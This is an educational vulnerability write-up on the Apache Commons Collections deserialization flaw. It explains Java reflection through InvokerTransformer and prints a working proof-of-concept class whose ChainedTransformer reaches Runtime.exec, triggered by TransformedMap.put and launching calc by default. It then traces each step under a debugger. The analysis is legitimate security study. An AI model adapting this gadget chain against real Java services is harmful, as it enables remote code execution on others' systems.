Let's analyze this simple test code, starting with the first line:

Transformer transformer = new InvokerTransformer("append", new Class[]{String.class}, new Object[]{"by SecFree"});

First an InvokerTransformer object is instantiated, passing the method name to execute, the parameter types, and the parameter values; the values and types passed in must be consistent with what the target Java class defines.

From the constructor definition we can also see the expected parameter types: the parameter-type argument is an array of Class objects. Then the second line:

Object newobject = transformer.transform(new StringBuffer("hi"));

Here the transform method of the transformer is called, passing an anonymous StringBuffer object. The transform function is declared to return Object, and its parameter is also of type Object.

If the input is not null, transform calls getClass to obtain the current object's class, then calls getMethod on that class object with two parameters: the first is the name of the method to call, and the second is the method's parameter types. getMethod returns a value of type Method, and the call we want can then be completed by calling invoke on it.

In this example, reflection completes a call to StringBuffer's append method, whose parameter is of type String: append appends the given string to the current StringBuffer's contents and returns the current buffer.
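The getClass, getMethod, invoke sequence described above can be reproduced without Commons Collections at all. The following sketch (the class and helper names are mine, not the library's) mimics what InvokerTransformer.transform does internally:

```java
import java.lang.reflect.Method;

public class TransformSketch {

    // Mimics InvokerTransformer.transform: look up a method by name on the
    // input's runtime class, then invoke it with the stored arguments.
    static Object transform(Object input, String methodName,
                            Class<?>[] paramTypes, Object[] args) throws Exception {
        Class<?> cls = input.getClass();                       // input.getClass()
        Method method = cls.getMethod(methodName, paramTypes); // cls.getMethod(...)
        return method.invoke(input, args);                     // method.invoke(input, args)
    }

    public static void main(String[] args) throws Exception {
        // The same call the article performs: StringBuffer("hi ").append("by SecFree")
        Object result = transform(new StringBuffer("hi "), "append",
                new Class[]{String.class}, new Object[]{"by SecFree"});
        System.out.println(result); // prints "hi by SecFree"
    }
}
```

The key point this demonstrates is that the caller controls the method name, parameter types and arguments, which is exactly what makes InvokerTransformer dangerous when attacker-controlled data reaches it.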

0x03 Vulnerability analysis:

This article explains the cause of the vulnerability in great detail: https: //

Apache Commons Collections is a third-party library that extends the Collection framework of the Java standard library.

The org.apache.commons.collections package extends and enhances the standard Java collections framework; these extensions still belong to the basic concept of a collection but add functionality. A collection in Java can be understood as a group of objects: concretely, set, list, queue and so on are collection types. Put another way, collection is the abstraction of set, list and queue.

Among them is an interface whose implementation can invoke any function via reflection, namely InvokerTransformer.

poc as follows:

import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

public class collections {
    public static void main(String[] args) {
        String command = (args.length != 0) ? args[0] : "calc";
        String[] execArgs = command.split(",");
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String[].class},
                        new Object[]{execArgs})
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map tempMap = new HashMap();
        Map exMap = TransformedMap.decorate(tempMap, null, transformerChain);
        exMap.put("by", "SecFree");
    }
}

The poc's logic can be understood as follows:

Construct the BeforeTransformerMap key-value pairs and decorate them via the TransformedMap.decorate method, which can apply a transformation to the Map's keys or values.

The TransformedMap.decorate method transforms a Map data structure; it takes three parameters. The first is the Map object to be decorated, the second is the transformation the Map's keys go through (which may be a single transformer, a chain, or null), and the third is the transformation the Map's values go through.

TransformedMap.decorate(target Map, key transformer (single, chain, or null), value transformer (single, chain, or null));

In this poc the values of BeforeTransformerMap are transformed; once a value has gone through the complete transformation chain, command execution is complete.

 Transformer transforms[] = {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", new Class[0]}),
        new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class}, new Object[] {null, new Object[0]}),
        new InvokerTransformer("exec", new Class[] {String[].class}, new Object[] {commands})
};

The code above constitutes the transformer chain. When this chain finishes its transformations, the code execution is complete; the chain is equivalent to executing:
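The equivalent snippet is not shown in the original text; unfolding the chain link by link, it presumably amounts to the classic reflective Runtime.getRuntime().exec(command) call. A harmless sketch of the first three links (stopping before exec so nothing is actually executed; class and variable names are mine):

```java
import java.lang.reflect.Method;

public class ChainUnfolded {
    public static void main(String[] args) throws Exception {
        // Link 1: ConstantTransformer(Runtime.class) ignores its input and
        // hands the Runtime class object to the next link
        Object step1 = Runtime.class;

        // Link 2: InvokerTransformer("getMethod", ...) calls
        // Runtime.class.getMethod("getRuntime") -> a Method object
        Method step2 = ((Class<?>) step1).getMethod("getRuntime", new Class[0]);

        // Link 3: InvokerTransformer("invoke", ...) calls
        // step2.invoke(null) -> the Runtime singleton (null receiver: static method)
        Object step3 = step2.invoke(null, new Object[0]);

        // Link 4 would be InvokerTransformer("exec", ...): step3.exec(command).
        // Omitted here so the sketch stays harmless.
        System.out.println(step3 == Runtime.getRuntime()); // prints "true"
    }
}
```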


0x04 PoC breakpoint debugging analysis:

The first step defines the command to execute and the transformer chain, which is in fact an array of objects.

The first element is a ConstantTransformer object whose constructor parameter is Runtime.class, i.e. the class object of the Runtime class obtained via .class.

Here it is assigned to the iConstant member variable of the ConstantTransformer class; why the first element is this class object will be explained below.

The second element is an object of the InvokerTransformer class, whose role we already know:

        Transformer transformer = new InvokerTransformer("append", new Class[]{String.class}, new Object[]{"by SecFree"});
        String newobject = transformer.transform(new StringBuffer("hi ")).toString();

The lines above complete a function call via reflection: first define an InvokerTransformer object, then complete the desired call by invoking that object's transform method.

In its constructor, the first parameter is the name of the method we want to call, getMethod; the second is the parameter types; and the third is the parameter values. Here this amounts to calling the getRuntime function through getMethod.

We already know that reflection obtains the target function through getMethod; the next step is to pass in the class object on which the function should be triggered, tying our goal to the target class.

So, as shown above, invoke is called next; the parameter types passed to invoke are the Object class and an Object array.


The final step calls the exec function to execute code. Its parameter type is String[], which allows multiple commands to be executed, and the parameter is the previously defined command. At this point the Transformer object array has been constructed.

The purpose of putting the functions to execute into an array is to form a function chain. The next step is to create a ChainedTransformer object with the transformers array as its constructor parameter. The ChainedTransformer class has a method that executes the function chain, namely its transform method.

It calls, in turn, the transform method of each object stored in the iTransformers array, which executes the functions we need one after another.

The transformer chain is stored in the iTransformers variable for later calls.


As shown above, the last three lines are the trigger of the commons-collections deserialization. First construct a map object, using Java generics to specify the HashMap's key type. Then use TransformedMap's decorate method to wrap the map object; the wrapper's role is to specify the transformation the map's keys and values must go through (this can also be a chain, here the transformerChain we assigned). You can specify a key transformer, a value transformer, or both. Next, the map's entries are modified through the put method, where put(key, value) adds the pair to the HashMap; this triggers the transformer chain defined in decorate, and the function calls begin:

Single-stepping (F7) into put: TransformedMap's put method is triggered, because decorate returned an object of the TransformedMap class. The key is transformed first.

Then it checks whether valueTransformer, the value transformer, is null; in our case it is not, because we defined the transformer chain as the map's value transformation.

As can be seen, valueTransformer is the chain wrapped earlier by decorate, so valueTransformer's transform method is invoked with the parameter "SecFree", a string.

F7 single-step into the first object of the chain, a ConstantTransformer: its transform function ignores its input entirely and returns iConstant, and since iConstant is under our control, any class can be returned here. In this case it returns the class object of java.lang.Runtime.

On the second iteration of the loop, the object has become the class object of java.lang.Runtime.

Execution now enters the transform method of the second link in the chain, an InvokerTransformer. We already know this class's transform method completes a function call; here .getClass() directly obtains the type of the java.lang.Runtime class object.

At this point the reflective call of java.lang.Runtime's getMethod function is completed (passing in the function to be reflected from the class object), with the parameter getRuntime (this.iArgs).

That is, what is returned is the Method object for java.lang.Runtime.getRuntime.



On the third pass through the loop, cls is an object of the java.lang.reflect.Method class; the invoke function can be obtained through getMethod, and the third line then calls invoke on the getRuntime Method object so that the exec function can be called next.

The method at this point is:

The java.lang.reflect.Method class provides information about, and access to, a single method of a class or interface. The reflected method may be a class (static) method or an instance method (including abstract methods).

java.lang.reflect.Method.invoke(Object obj, Object... args) invokes the underlying method represented by this Method object with the specified receiver and arguments.

As shown above, we already know that the method variable stores the method we need to access. Method.invoke() executes the method on the object given by invoke's first argument, with the parameters given by the second argument, and returns the result.
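The invoke semantics just described (static methods ignore the receiver, instance methods require one) can be checked directly. A small sketch, independent of the poc (class name is mine):

```java
import java.lang.reflect.Method;

public class InvokeSemantics {
    public static void main(String[] args) throws Exception {
        // getRuntime is static, so the receiver argument of invoke() is ignored;
        // null works, which is exactly what the transformer chain passes
        Method getRuntime = Runtime.class.getMethod("getRuntime");
        Runtime rt = (Runtime) getRuntime.invoke(null);
        System.out.println(rt == Runtime.getRuntime()); // prints "true"

        // For an instance method, the first argument is the receiver object
        Method length = String.class.getMethod("length");
        System.out.println(length.invoke("calc")); // prints "4"
    }
}
```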

So at this point method.invoke amounts to calling getRuntime; when we enter the fourth round of the loop, object is the return value of the previous getRuntime invocation, i.e. the Runtime object associated with the current Java application.

On the fourth iteration, the exec function is called to execute calc. The class of the runtime object, java.lang.Runtime, is obtained via getClass, then the exec method of the java.lang.Runtime class is obtained via getMethod.

Finally, method.invoke reflectively calls the exec function of java.lang.Runtime with the parameter calc, and the calculator pops up.

0x05. Reference: